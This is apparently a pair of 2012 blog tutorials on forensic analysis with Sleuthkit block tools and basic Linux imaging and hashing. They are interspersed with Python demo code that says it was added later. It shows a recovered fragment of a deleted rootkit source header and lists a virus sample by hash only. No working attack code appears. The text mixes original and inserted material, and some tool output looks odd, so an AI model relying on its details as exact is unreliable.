Wednesday, October 31, 2012

Sleuthkit Exercise


As the size of media being examined continues to grow, it is becoming
apparent to many investigators that data reduction techniques are more
important than ever. These techniques take on several forms, including hash
analysis (removing known "good" files from a data set, for example) and
separating allocated space in an image from unallocated space, allowing them
to be searched separately with specialized tools. We will be doing the latter
in this exercise.
The Sleuthkit comes with a set of tools for handling information at the
"block" layer of the analysis model. The block layer consists of the actual file
system blocks that hold the information we are seeking.
They are not specific to unallocated data only, but are especially useful for
working on unallocated blocks that have been extracted from an image.
The tools that manipulate this layer, as you would expect, start with blk and include:

  blkls
  blkcalc
  blkstat
  blkcat

    We will be focusing on blkls, blkcalc and blkstat for the next couple of exercises.


The tool that starts us off here is blkls. This command “lists all the data
blocks”. If you were to use the “-e” option, the output would be the same as
the output of dd for that volume, since -e tells blkls to copy “every block”.
However, by default, blkls will only copy out the unallocated blocks of an
image.
This allows us to separate allocated and unallocated blocks in our file
system. We can use logical tools (find, ls, etc.) on the “live” files in a mounted
file system, and concentrate data recovery efforts on only those blocks that
may contain deleted or otherwise unallocated data. Conversely, when we do a
physical search of the output of blkls, we can be sure that artifacts found are
from unallocated content.

To illustrate what we are talking about here, we'll run the same exercise
we did in Sleuthkit Exercise #2, this time extracting the unallocated data from
our volume of interest and comparing the output from the whole volume
analysis vs. unallocated analysis. So, we'll be working on the able2.dd image
from earlier. We expect to get the same results we did in Exercise #2, but this
time by analyzing only the unallocated space, and then associating the
recovered data with its original location in the full disk image.

First we'll need to change into the directory containing our able2.dd
image. Then we check the partition table and decide which volume we'll be
examining. Recall that this is where we get our -o (offset) value from for our
Sleuthkit commands. To do this, we run the mmls command:


 root@bt:~# mkdir ~/Rby
mkdir: cannot create directory `/root/Rby': File exists

root@bt:~# cd ~/Rby
root@bt:~/Rby# mmls able2.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000000056   0000000057   Unallocated
02:  00:00   0000000057   0000010259   0000010203   Linux (0x83)
03:  00:01   0000010260   0000112859   0000102600   Linux (0x83)
04:  00:02   0000112860   0000178694   0000065835   Linux Swap / Solaris x86 (0x82)
05:  00:03   0000178695   0000675449   0000496755   Linux (0x83)

As with Exercise #2, we've decided to search the unallocated space in the
second Linux partition (at offset 10260, entry 03 in the table above).

We run the blkls command using the offset option (-o) which indicates
what partition's file system we are analyzing. We then redirect the output to a
new file that will contain only the unallocated blocks of that particular volume.

root@bt:~/Rby# blkls -o 10260 able2.dd > able2.blkls
root@bt:~/Rby# ls -lh                                                
total 340M
-rw-r--r-- 1 root root 9.3M 2012-10-31 16:53 able2.blkls
-rwxrwxrwx 1 root root 330M 2012-10-23 18:38 able2.dd

In the above command, we are using blkls on the second partition (-o
10260) within the able2.dd image, and redirecting the output to a file called
able2.blkls. The file able2.blkls will contain only the unallocated blocks from
the target file system.
Now, as we did in our previous analysis of this file system (Exercise #2),
we will use grep, this time on the extracted unallocated space (our able2.blkls
file), to search for our text string of interest. Read back through Exercise #2 if
you need a refresher on these commands.

root@bt:~/Rby# grep -abi cybernetik able2.blkls
1631299: *      updated by Cybernetik for linux rootkit
9317041:Cybernetik proudly presents...
9323055:Email: cybernetik@nym.alias.net
9323087:Finger: cybernetik@nym.alias.net


The grep command above now tells us that we have found the string
“cybernetik” at four different offsets in the extracted unallocated space. We
will concentrate on the first hit here. Of course these are different from the
offsets we found in Exercise #2 because we are no longer searching the entire
original dd image.
So the next obvious question is “so what?”. We found potential evidence
in our extracted unallocated space. But how does it relate to the original
image? As forensic examiners, merely finding potential evidence is not good
enough. We also need to know where it came from (physical location in the
original image), what file it belongs or (possibly) belonged to, meta data
associated with the file, and context. Finding potential evidence in a big block
of aggregate unallocated space is of little use to us if we cannot at least make
some effort at attribution in the original file system.
That's where the other block layer tools come in. We can use blkcalc to
calculate the location (by data block or fragment) in our original image. Once
we've done that, we simply use the meta data layer tools to identify and
potentially recover the original file, as we did in our previous effort.
First we need to gather a bit of data about the original file system. We
run the fsstat command to determine the size of the data blocks we are
working with.

root@bt:~/Rby# fsstat -o 10260 able2.dd
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext2
Volume Name:
Volume ID: 906e777080e09488d0116064da18c0c4

Last Written at: Mon Aug 11 01:50:03 2003
Last Checked at: Tue Feb 11 12:20:09 1997

Last Mounted at: Thu Feb 13 14:33:02 1997
Unmounted Improperly
Last mounted on:

Source OS: Linux
Dynamic Structure
InCompat Features: Filetype,
Read Only Compat Features: Sparse Super,

METADATA INFORMATION
--------------------------------------------
Inode Range: 1 - 12881
Root Directory: 2
Free Inodes: 5807

CONTENT INFORMATION
--------------------------------------------
Block Range: 0 - 51299
Block Size: 1024
Reserved Blocks Before Block Groups: 1
Free Blocks: 9512

BLOCK GROUP INFORMATION
--------------------------------------------
Number of Block Groups: 7
Inodes per group: 1840
Blocks per group: 8192

Group: 0:
  Inode Range: 1 - 1840
  Block Range: 1 - 8192
  Layout:
    Super Block: 1 - 1
    Group Descriptor Table: 2 - 2
    Data bitmap: 3 - 3
    Inode bitmap: 4 - 4
    Inode Table: 5 - 234
    Data Blocks: 235 - 8192
  Free Inodes: 789 (42%)
  Free Blocks: 4601 (56%)
  Total Directories: 16

Group: 1:
  Inode Range: 1841 - 3680
  Block Range: 8193 - 16384
  Layout:
    Super Block: 8193 - 8193
    Group Descriptor Table: 8194 - 8194
    Data bitmap: 8195 - 8195
    Inode bitmap: 8196 - 8196
    Inode Table: 8197 - 8426
    Data Blocks: 8427 - 16384
  Free Inodes: 1542 (83%)
  Free Blocks: 33 (0%)
  Total Directories: 13

Group: 2:
  Inode Range: 3681 - 5520
  Block Range: 16385 - 24576
  Layout:
    Data bitmap: 16385 - 16385
    Inode bitmap: 16386 - 16386
    Inode Table: 16389 - 16618
    Data Blocks: 16387 - 16388, 16619 - 24576
  Free Inodes: 0 (0%)
  Free Blocks: 1813 (22%)
  Total Directories: 12

Group: 3:
  Inode Range: 5521 - 7360
  Block Range: 24577 - 32768
  Layout:
    Super Block: 24577 - 24577
    Group Descriptor Table: 24578 - 24578
    Data bitmap: 24579 - 24579
    Inode bitmap: 24580 - 24580
    Inode Table: 24581 - 24810
    Data Blocks: 24811 - 32768
  Free Inodes: 746 (40%)
  Free Blocks: 2379 (29%)
  Total Directories: 76

Group: 4:
  Inode Range: 7361 - 9200
  Block Range: 32769 - 40960
  Layout:
    Data bitmap: 32769 - 32769
    Inode bitmap: 32770 - 32770
    Inode Table: 32773 - 33002
    Data Blocks: 32771 - 32772, 33003 - 40960
  Free Inodes: 0 (0%)
  Free Blocks: 0 (0%)
  Total Directories: 10

Group: 5:
  Inode Range: 9201 - 11040
  Block Range: 40961 - 49152
  Layout:
    Super Block: 40961 - 40961
    Group Descriptor Table: 40962 - 40962
    Data bitmap: 40963 - 40963
    Inode bitmap: 40964 - 40964
    Inode Table: 40965 - 41194
    Data Blocks: 41195 - 49152
  Free Inodes: 969 (52%)
  Free Blocks: 545 (6%)
  Total Directories: 4

Group: 6:
  Inode Range: 11041 - 12880
  Block Range: 49153 - 51299
  Layout:
    Data bitmap: 49153 - 49153
    Inode bitmap: 49154 - 49154
    Inode Table: 49157 - 49386
    Data Blocks: 49155 - 49156, 49387 - 51299
  Free Inodes: 1761 (176100%)
  Free Blocks: 141 (6%)
  Total Directories: 18

In the fsstat output above, we see that the block size (under CONTENT
INFORMATION) is 1024. We take the byte offset from our grep output on the
able2.blkls image and divide it by 1024. This tells us how many unallocated
data blocks into the extracted unallocated image we found our string of interest.
We use the echo command to pass the math expression to the command line
calculator, bc, which by default truncates the result to a whole number:

root@bt:~/Rby# echo "1631299/1024" | bc
1593

We now know, from the above output, that the string “cybernetik” is in
data block 1593 of our extracted unallocated file, able2.blkls.
This is where our handy blkcalc command comes in. We use blkcalc
with the -u option to specify that we want to calculate the block address from
an extracted unallocated image (from blkls output). We run the command on
the original dd image because we are calculating the original data block in that
image.

root@bt:~/Rby# blkcalc -o 10260 -u 1593 able2.dd
5184

The command above is running blkcalc on the file system at offset
10260 (-o 10260) in the original able2.dd, passing the data block we calculated
from the blkls image able2.blkls (-u 1593). The result is a familiar block 5184
(see Exercise #2 again). The illustration below gives a visual representation of a
simple example:

[Illustration not reproduced here: block #3 of the blkls image maps to block #49 of the original file system.]

In the illustrated example above, the data in block #3 of the blkls image
would map to block #49 in the original file system. We would find this with the
blkcalc command as shown (this is just an illustration, and does not apply to
the current exercise):


root@bt:~/example# blkcalc -o $fs_offset -u 3 original.dd
49
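To make that mapping concrete, here is an added Python model of what blkls and blkcalc are doing with the file system's block allocation bitmap. This is my own illustration code, not part of The Sleuth Kit or of this exercise: the bitmap, the block numbers and the grep line in it are constructed for the demo, the function names are mine, and the only real figures are the 1631299 / 1024 pair from above. It assumes, as the exercise's division implies, that blkls numbers its output blocks from 0, and it keeps the remainder of the division, which bc's integer division throws away.

```python
# Added example: a pure-Python model of blkls / blkcalc against a block
# allocation bitmap, plus the grep-offset-to-block arithmetic used in the
# exercise. All bitmaps and sample data here are constructed, not from able2.dd.
from typing import Dict, List, Tuple


def unallocated_blocks(allocated: List[bool]) -> List[int]:
    """Original block addresses that blkls (without -e) copies out, in order.

    allocated[i] is True when block i of the original file system is in use.
    blkls output is just every unallocated block concatenated, so block N of
    the blkls output is the Nth (0-based) unallocated block of the original.
    """
    return [blk for blk, in_use in enumerate(allocated) if not in_use]


def blkcalc_u(allocated: List[bool], blkls_block: int) -> int:
    """Equivalent of `blkcalc -u N`: blkls-output block N -> original block."""
    unalloc = unallocated_blocks(allocated)
    if not 0 <= blkls_block < len(unalloc):
        raise ValueError(
            f"blkls block {blkls_block} is beyond the {len(unalloc)} unallocated blocks")
    return unalloc[blkls_block]


def blkcalc_d(allocated: List[bool], orig_block: int) -> int:
    """Reverse direction (`blkcalc -d N`): original block -> blkls-output block.

    An allocated block never appears in blkls output, so there is no answer
    for it; that is the error case an examiner should expect to hit.
    """
    if allocated[orig_block]:
        raise ValueError(f"block {orig_block} is allocated and is not in the blkls output")
    return sum(1 for in_use in allocated[:orig_block] if not in_use)


def grep_offset_to_block(byte_offset: int, block_size: int) -> Tuple[int, int]:
    """Turn a `grep -ab` byte offset into (block number, offset inside the block).

    The exercise does the first half with `echo "1631299/1024" | bc`; the
    remainder is where the hit starts inside the block, useful when viewing
    it with blkcat | xxd.
    """
    return divmod(byte_offset, block_size)


def parse_grep_hits(grep_output: str) -> List[Tuple[int, str]]:
    """Parse `grep -ab` lines of the form `<byte offset>:<matching text>`."""
    hits = []
    for line in grep_output.splitlines():
        offset, sep, text = line.partition(":")
        if sep and offset.isdigit():
            hits.append((int(offset), text))
    return hits


def map_hits(grep_output: str, allocated: List[bool], block_size: int) -> List[Dict[str, int]]:
    """For each grep hit in a blkls image, work out the original block it came from."""
    results = []
    for byte_offset, _text in parse_grep_hits(grep_output):
        blkls_block, in_block = grep_offset_to_block(byte_offset, block_size)
        results.append({
            "grep_offset": byte_offset,
            "blkls_block": blkls_block,
            "offset_in_block": in_block,
            "original_block": blkcalc_u(allocated, blkls_block),
        })
    return results


# Constructed 64-block file system: everything allocated except these blocks.
# With this layout, block 3 of the blkls output is original block 49, matching
# the illustration above.
UNALLOCATED = {10, 20, 30, 49, 55, 60}
SAMPLE_BITMAP = [blk not in UNALLOCATED for blk in range(64)]
BLOCK_SIZE = 1024

# Constructed `grep -ab` output from a blkls image of that file system.
SAMPLE_GREP = "3140:Cybernetik proudly presents...\n"


if __name__ == "__main__":
    print(grep_offset_to_block(1631299, 1024))   # the exercise's own numbers
    for hit in map_hits(SAMPLE_GREP, SAMPLE_BITMAP, BLOCK_SIZE):
        print(hit)
```

The real blkcalc reads the allocation bitmap out of the file system at the -o offset; the model above just takes the bitmap as a Python list so it can run without an image.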


So, in simple terms, we have extracted the unallocated space, found a
string of interest in a data block in the unallocated image, and then found the
corresponding data block in the original image.
If we look at the blkstat (data block statistics) output for block 5184 in
the original image, we see that it is, in fact, unallocated, which makes sense,
since we found it within our extracted unallocated space (we're back to the
same results as in Exercise #2). Note that we are now running the commands
on the original dd image. We'll continue on for the sake of completeness.

root@bt:~/Rby# blkstat -o 10260 able2.dd 5184
Fragment: 5184
Not Allocated
Group: 0

Using the command blkcat we can look at the raw contents of the data
block (using xxd and less as a viewer). If we want to, we can even use blkcat to
extract the block, redirecting the contents to another file:

root@bt:~/Rby# blkcat -o 10260 able2.dd 5184 | xxd | less
0000000: 2f2a 0a20 2a09 6669 7865 722e 630a 202a  /*. *.fixer.c. *
0000010: 0962 7920 4964 6566 6978 200a 202a 0969  .by Idefix . *.i
0000020: 6e73 7069 7265 6420 6f6e 2073 756d 2e63  nspired on sum.c
0000030: 2061 6e64 2053 6169 6e74 5374 6174 2032   and SaintStat 2
0000040: 2e30 0a20 2a09 7570 6461 7465 6420 6279  .0. *.updated by
0000050: 2043 7962 6572 6e65 7469 6b20 666f 7220   Cybernetik for

root@bt:~/Rby# blkcat -o 10260 able2.dd 5184 > 5184.blkcat
root@bt:~/Rby# ls -lh
total 340M
-rw-r--r-- 1 root root 1.0K 2012-10-31 17:16 5184.blkcat
-rw-r--r-- 1 root root 9.3M 2012-10-31 16:53 able2.blkls
-rwxrwxrwx 1 root root 330M 2012-10-23 18:38 able2.dd

Note the size of the file resulting from the blkcat output (5184.blkcat) is
1.0k (1024 bytes – the file system block size), just as expected.

If we want to recover the actual file and meta data associated with the
identified data block, we use ifind to determine which meta data structure (in
this case inode since we are working on an EXT file system) holds the data in
block 5184. Then istat shows us the meta data for the inode:

root@bt:~/Rby# ifind -o 10260 -d 5184 able2.dd
10090
root@bt:~/Rby# istat -o 10260 able2.dd 10090
inode: 10090
Not Allocated
Group: 5
Generation Id: 3534950782
uid / gid: 4 / 7
mode: rrw-r--r--
size: 3591
num of links: 0

Inode Times:
Accessed:       Sun Aug 10 11:18:36 2003
File Modified:  Thu Dec 26 04:27:43 1996
Inode Modified: Sun Aug 10 11:29:58 2003
Deleted:        Sun Aug 10 11:29:58 2003

Direct Blocks:
5184 5185 5186 5187

Again, as we saw previously, the istat command, which shows us the
meta data for inode 10090, indicates that the file with this inode is Not
Allocated, and its first direct block is 5184. Just as we expected.
We then use icat to recover the file. In this case, we just pipe the first few
lines out to see our string of interest, “cybernetik”.

root@bt:~/Rby# icat -o 10260 able2.dd 10090 | head -n 10
/*
 *      fixer.c
 *      by Idefix
 *      inspired on sum.c and SaintStat 2.0
 *      updated by Cybernetik for linux rootkit
 */
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>

Tuesday, October 30, 2012

Linux and Forensic Tools


Included Forensic Tools
Linux comes with a number of simple utilities that make imaging and basic analysis of suspect disks and drives
comparatively easy. These tools include:
*dd - command used to copy from an input file or device to an output file or device; simple bitstream imaging.
*sfdisk and fdisk - used to determine the disk structure.
*grep - search files (or multiple files) for instances of an expression or pattern.
*The loop device - allows you to associate regular files with device nodes. This will then allow you to mount
a bitstream image without having to rewrite the image to a disk.
*md5sum and sha1sum - create and store an MD5 or SHA1 hash of a file or list of files (including devices).
*file - reads a file's header information in an attempt to ascertain its type, regardless of name or extension.
*xxd - command line hexdump tool, for viewing a file in hex mode.
Following is a very simple series of steps to allow you to perform easy practice analysis
using the simple Linux tools mentioned above. All of the commands can be further explored with
"man command". For simplicity we are going to use a floppy with a FAT file system. Again,
this is just an introduction to the basic commands. These steps can be far more powerful with some
command line tweaking.



Once you download the floppy image, put a blank floppy disk in your drive and create the practice
floppy with the following command (covered in detail later):

root@bt:~# dd if=practical.floppy.dd of=/dev/fd0
2880+0 records in
2880+0 records out
1474560 bytes (1.5 MB) copied, 0.337022 s, 4.4 MB/s
root@bt:~# md5sum /dev/fd0
2f4791784e2af37cf196e6a72cc79d99  /dev/fd0

One way of organizing your data would be to create a directory in your "home" directory for evidence
and then a subdirectory for each case. Since we will be executing these commands as root,
the home directory is /root:
root@bt:~# mkdir ~/evid/
mkdir: cannot create directory `/root/evid/': File exists


An additional step you might want to take is to create a special mount point for all subject file
system analysis. This is another way of separating common system use from evidence processing:

root@bt:~# mkdir /mnt/analysis/
mkdir: cannot create directory `/mnt/analysis/': File exists


There are two simple tools available for determining the structure of a disk attached to your system.
The first, fdisk, we discussed earlier using the -l option. Replace the "x" in the device name with the letter
of the drive that corresponds to the subject drive. For example, if our subject disk is attached on the secondary IDE
channel as the master disk, it will be seen as /dev/hdc. A serial ATA (SATA) disk will be /dev/sda (or sdb, etc.).
We can get the partition information on that disk with:

root@bt:~# fdisk -l /dev/hdc
root@bt:~# fdisk -l /dev/sda
Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xe23b2a65

   Device Boot      Start         End      Blocks   Id  System
/dev/sda3               1       10707    86003946    7  HPFS/NTFS
/dev/sda4           19467       60802   332018689    f  W95 Ext'd (LBA)
/dev/sda5           19467       25841    51200984+   7  HPFS/NTFS
/dev/sda6           25880       34293    67585423+   7  HPFS/NTFS
/dev/sda7           34294       40004    45873576    7  HPFS/NTFS
/dev/sda8           40005       40251     1983996   82  Linux swap / Solaris
/dev/sda9           40252       60801   165067843+  83  Linux
root@bt:~# fdisk -l /dev/sda3

Disk /dev/sda3: 88.1 GB, 88068040704 bytes
255 heads, 63 sectors/track, 10706 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x6e697373

This doesn't look like a partition table
Probably you selected the wrong device.

     Device Boot      Start         End      Blocks   Id  System
/dev/sda3p1   ?      120528      234814   918008208   4f  QNX4.x 3rd part
Partition 1 does not end on cylinder boundary.
/dev/sda3p2   ?      119381      153271   272218546+  73  Unknown
Partition 2 does not end on cylinder boundary.
/dev/sda3p3   ?      113202      147075   272087568   2b  Unknown
Partition 3 does not end on cylinder boundary.
/dev/sda3p4   ?      177064      177067       27487   61  SpeedStor
Partition 4 does not end on cylinder boundary.
Partition table entries are not in disk order

We can redirect the output of this command to a file for later use by issuing the command as:
root@bt:~# fdisk -l /dev/sda3 > ~/evid/fdisk.disk1
One thing to note here: the name of the output file (fdisk.disk1) is completely arbitrary.


Make an image of the practice disk using basic dd. This is your standard forensic image of a suspect disk.
Change to and execute the command from within the /root/evid/ directory:

root@bt:~# cd ~/evid/
root@bt:~/evid# dd if=/dev/sda3 of=image.disk1  bs=512
^C24834529+0 records in
24834529+0 records out
12715278848 bytes (13 GB) copied, 557.744 s, 22.8 MB/s

root@bt:~/evid# fdisk -l

Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xe23b2a65

   Device Boot      Start         End      Blocks   Id  System
/dev/sda3               1       10707    86003946    7  HPFS/NTFS
/dev/sda4           19467       60802   332018689    f  W95 Ext'd (LBA)
/dev/sda5           19467       25841    51200984+   7  HPFS/NTFS
/dev/sda6           25880       34293    67585423+   7  HPFS/NTFS
/dev/sda7           34294       40004    45873576    7  HPFS/NTFS
/dev/sda8           40005       40251     1983996   82  Linux swap / Solaris
/dev/sda9           40252       60801   165067843+  83  Linux
Note: sector size is 2048 (not 512)

Disk /dev/sdb: 1047 MB, 1047263232 bytes
33 heads, 61 sectors/track, 254 cylinders
Units = cylinders of 2013 * 2048 = 4122624 bytes
Sector size (logical/physical): 2048 bytes / 2048 bytes
I/O size (minimum/optimal): 2048 bytes / 2048 bytes
Disk identifier: 0x6f20736b

This doesn't look like a partition table
Probably you selected the wrong device.

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   ?      386556      953625  2283019262   72  Unknown
Partition 1 has different physical/logical beginnings (non-Linux?):
     phys=(357, 116, 40) logical=(386555, 11, 23)
Partition 1 has different physical/logical endings:
     phys=(357, 32, 45) logical=(953624, 6, 61)
Partition 1 does not end on cylinder boundary.
/dev/sdb2   ?       83801     1045563  3872056480   65  Novell Netware 386
Partition 2 has different physical/logical beginnings (non-Linux?):
     phys=(288, 115, 43) logical=(83800, 2, 1)
Partition 2 has different physical/logical endings:
     phys=(367, 114, 50) logical=(1045562, 23, 53)
Partition 2 does not end on cylinder boundary.
Partition 2 does not start on physical sector boundary.
/dev/sdb3   ?      928903     1890666  3872056384   79  Unknown
Partition 3 has different physical/logical beginnings (non-Linux?):
     phys=(366, 32, 33) logical=(928902, 28, 32)
Partition 3 has different physical/logical endings:
     phys=(357, 32, 43) logical=(1890665, 16, 36)
Partition 3 does not end on cylinder boundary.
Partition 3 does not start on physical sector boundary.
/dev/sdb4   ?     1433523     1433551      110998    d  Unknown
Partition 4 has different physical/logical beginnings (non-Linux?):
     phys=(372, 97, 50) logical=(1433522, 22, 25)
Partition 4 has different physical/logical endings:
     phys=(0, 10, 0) logical=(1433550, 8, 13)
Partition 4 does not end on cylinder boundary.
Partition table entries are not in disk order

root@bt:~/evid# fdisk -l /dev/sdb
Note: sector size is 2048 (not 512)
Disk /dev/sdb: 1047 MB, 1047263232 bytes
33 heads, 61 sectors/track, 254 cylinders
Units = cylinders of 2013 * 2048 = 4122624 bytes
Sector size (logical/physical): 2048 bytes / 2048 bytes
I/O size (minimum/optimal): 2048 bytes / 2048 bytes
Disk identifier: 0x6f20736b
This doesn't look like a partition table
Probably you selected the wrong device.
 Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   ?      386556      953625  2283019262   72  Unknown
Partition 1 has different physical/logical beginnings (non-Linux?):
     phys=(357, 116, 40) logical=(386555, 11, 23)
Partition 1 has different physical/logical endings:
     phys=(357, 32, 45) logical=(953624, 6, 61)
Partition 1 does not end on cylinder boundary.
/dev/sdb2   ?       83801     1045563  3872056480   65  Novell Netware 386
Partition 2 has different physical/logical beginnings (non-Linux?):
     phys=(288, 115, 43) logical=(83800, 2, 1)
Partition 2 has different physical/logical endings:
     phys=(367, 114, 50) logical=(1045562, 23, 53)
Partition 2 does not end on cylinder boundary.
Partition 2 does not start on physical sector boundary.
/dev/sdb3   ?      928903     1890666  3872056384   79  Unknown
Partition 3 has different physical/logical beginnings (non-Linux?):
     phys=(366, 32, 33) logical=(928902, 28, 32)
Partition 3 has different physical/logical endings:
     phys=(357, 32, 43) logical=(1890665, 16, 36)
Partition 3 does not end on cylinder boundary.
Partition 3 does not start on physical sector boundary.
/dev/sdb4   ?     1433523     1433551      110998    d  Unknown
Partition 4 has different physical/logical beginnings (non-Linux?):
     phys=(372, 97, 50) logical=(1433522, 22, 25)
Partition 4 has different physical/logical endings:
     phys=(0, 10, 0) logical=(1433550, 8, 13)
Partition 4 does not end on cylinder boundary.
Partition table entries are not in disk order

root@bt:~/evid# dd if=/dev/sdb of=image.disk1  bs=512
2045436+0 records in
2045436+0 records out
1047263232 bytes (1.0 GB) copied, 103.362 s, 10.1 MB/s
root@bt:~/evid# md5sum /dev/sdb
044144780d449a3af7cd3a01b84c5099  /dev/sdb
root@bt:~/evid# dd if=/dev/sdb of=image.disk2  bs=512
2045436+0 records in
2045436+0 records out
1047263232 bytes (1.0 GB) copied, 103.264 s, 10.1 MB/s
root@bt:~/evid# md5sum /dev/sdb
044144780d449a3af7cd3a01b84c5099  /dev/sdb
root@bt:~/evid# md5sum image.disk2
044144780d449a3af7cd3a01b84c5099  image.disk2
root@bt:~/evid# mount -t vfat -o ro,noexec,loop image.disk2 /mnt/analysis
root@bt:~/evid# umount /mnt/analysis
root@bt:~/evid# sha1sum /dev/fd0
f5ee9cf56f23e5f5773e2a4854360404a62015cf  /dev/fd0

root@bt:~/evid# sha1sum /dev/sdb
a00f3b85b348befb2e4876135b2b4449476b4e0f  /dev/sdb
root@bt:~/evid# sha1sum /dev/sdb > sha.disk1
root@bt:~/evid# mount -t vfat -o ro,noexec,loop image.disk1 /mnt/analysis
root@bt:~/evid# cd /mnt/analysis/
root@bt:/mnt/analysis# find . -type f -exec sha1sum {} \; > ~/evid/sha.filelist
root@bt:/mnt/analysis# cat /root/evid/sha.filelist
86082e288fea4a0f5c5ed3c7c40b3e7947afec11  ./Docs/Benchmarks.xls
81e62f9f73633e85b91e7064655b0ed190228108  ./Docs/Computer_Build.xml
0950fb83dd03714d0c15622fa4c5efe719869e48  ./Docs/Law.doc
7a1d5170911a87a74ffff8569f85861bc2d2462d  ./Docs/whyhack
63ddc7bca46f08caa51e1d64a12885e1b4c33cc9  ./Pics/C800x600.jpg
8844614b5c2f90fd9df6f8c8766109573ae1b923  ./Pics/bike2.jpg
4cf18c44023c05fad0de98ed6b669dc4645f130b  ./Pics/bike3.jpg
aeb0151e67ff4dd5c00a19ee351801b5a6f11438  ./Pics/matrixs3.jpg
d252ac06995c1a6215ca5e7df7c3e02c79c24488  ./Pics/mulewheelie.gif
f6f8586eefb5f163eac2bd8ec09053d70cae000e  ./Pics/Stoppie.gif
49f0405267a653bac165795ee2f8d934fb1650a9  ./ARP.EXE
9a886c8e8ad376fc53d6398cdcf8aab9e93eda27  ./FTP.EXE
4c703ee9802aa110b0673d7ae80468e6418bf74c  ./loveletter.virus
7191c24f0f15cca6a5ef9a4db0aee7b40789d6c0  ./ouchy.dat
6666d9b50508360f4a2362e7fd74c91fcb68d2e8  ./snoof.gz

root@bt:/mnt/analysis# sha1sum -c /root/evid/sha.disk1
/dev/sdb: OK
root@bt:/mnt/analysis# sha1sum -c /root/evid/sha.filelist
./Docs/Benchmarks.xls: OK
./Docs/Computer_Build.xml: OK
./Docs/Law.doc: OK
./Docs/whyhack: OK
./Pics/C800x600.jpg: OK
./Pics/bike2.jpg: OK
./Pics/bike3.jpg: OK
./Pics/matrixs3.jpg: OK
./Pics/mulewheelie.gif: OK
./Pics/Stoppie.gif: OK
./ARP.EXE: OK
./FTP.EXE: OK
./loveletter.virus: OK
./ouchy.dat: OK
./snoof.gz: OK
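The sha1sum manifest and the `sha1sum -c` check above only ever show "OK" because nothing was touched between the two runs. As an added example (my own code, not part of this post), here is a small Python equivalent of `find . -type f -exec sha1sum {} \;` followed by `sha1sum -c`, which also shows the FAILED and MISSING results you get when a file under the mount point has been altered or removed. The directory tree it hashes is built in a temporary directory, and the file names and contents in it are constructed for the demo.

```python
# Added example: build a sha1sum-style manifest of a directory tree, then
# re-verify it after one file is altered and another is deleted. The tree and
# its contents are constructed in a temporary directory; nothing here touches
# a real evidence mount.
import hashlib
import os
import tempfile
from typing import Dict


def sha1_of_file(path: str) -> str:
    """Hash a file in chunks so large images do not have to fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> str:
    """sha1sum-style lines (`<hex>  ./relative/path`) for every regular file under root."""
    lines = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            rel = "./" + os.path.relpath(full, root).replace(os.sep, "/")
            lines.append(f"{sha1_of_file(full)}  {rel}")
    return "\n".join(sorted(lines)) + "\n"


def verify_manifest(root: str, manifest: str) -> Dict[str, str]:
    """Re-hash each listed file: OK, FAILED (content changed) or MISSING (gone)."""
    status = {}
    for line in manifest.splitlines():
        if not line.strip():
            continue
        expected, rel = line.split("  ", 1)   # sha1sum separates hash and name with two spaces
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            status[rel] = "MISSING"
        elif sha1_of_file(path) != expected:
            status[rel] = "FAILED"
        else:
            status[rel] = "OK"
    return status


def demo() -> Dict[str, str]:
    """Build a constructed tree, take a manifest, then tamper with it and verify."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Docs"))
        os.makedirs(os.path.join(root, "Pics"))
        files = {                                   # constructed sample contents
            "Docs/whyhack": b"constructed text file\n",
            "Pics/bike2.jpg": b"BM" + b"\x00" * 30,
            "snoof.gz": b"\x1f\x8b\x08" + b"\x00" * 13,
        }
        for rel, data in files.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        manifest = build_manifest(root)

        # What verification is there to catch: one file altered, one removed.
        with open(os.path.join(root, "Docs/whyhack"), "ab") as f:
            f.write(b"extra byte")
        os.remove(os.path.join(root, "snoof.gz"))
        return verify_manifest(root, manifest)


if __name__ == "__main__":
    for rel, result in demo().items():
        print(f"{rel}: {result}")
```

Hashing the device (or image) as a whole, as done with sha.disk1 above, tells you the image is intact; the per-file manifest is what lets you say which file changed, so keeping both is the usual practice.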

root@bt:/mnt/analysis# ls -al
.:
total 118
drwxr-xr-x 4 root root  7168 1970-01-01 07:00 .
drwxr-xr-x 3 root root  4096 2012-10-29 19:10 ..
-rwxr-xr-x 1 root root 19536 1996-08-24 11:11 ARP.EXE
drwxr-xr-x 3 root root   512 2000-09-23 15:21 Docs
-rwxr-xr-x 1 root root 37520 1996-08-24 11:11 FTP.EXE
-r-xr-xr-x 1 root root 16161 2000-09-21 07:46 loveletter.virus
-rwxr-xr-x 1 root root 21271 2000-03-19 19:00 ouchy.dat
drwxr-xr-x 2 root root   512 2000-09-23 15:21 Pics
-rwxr-xr-x 1 root root 12384 2000-08-02 07:43 snoof.gz

root@bt:ls -alR | less
drwxr-xr-x 2 root root   512 2000-09-23 15:21 Private
-rwxr-xr-x 1 root root  3928 2000-09-21 07:45 whyhack
./Docs/Private:
total 1
drwxr-xr-x 2 root root 512 2000-09-23 15:21 .
drwxr-xr-x 3 root root 512 2000-09-23 15:21 ..
./Pics:
total 1138
